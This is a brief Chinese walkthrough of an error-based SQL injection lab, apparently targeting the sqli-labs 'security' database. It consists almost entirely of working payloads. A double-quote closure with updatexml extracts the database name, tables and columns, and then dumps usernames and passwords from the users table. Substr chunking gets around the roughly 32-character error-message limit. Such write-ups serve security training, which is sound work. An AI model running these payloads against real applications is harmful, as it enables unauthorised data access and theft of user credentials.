0、初始页面
1、确定闭合字符
2、确定列数
3、确定回显位置
页面没有回显位置,但会显示数据库报错信息(即应用把数据库错误原样输出给了用户),因此后续步骤改用 updatexml 报错注入
a" union select 1,2 #
4、爆库名
a" and updatexml(1,concat(0x7e,database(),0x7e),1) #
5、爆表名
a" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #
6、爆列名
a" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security'),0x7e),1) #
7、查询最终结果
a" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) #
报错信息长度有限(约32个字符),结果过长时会被截断,可用 substr 每次取32个字符分段查看
a" and updatexml(1,concat(0x7e,(substr((select group_concat(username,0x3a,password) from users),1,32)),0x7e),1) #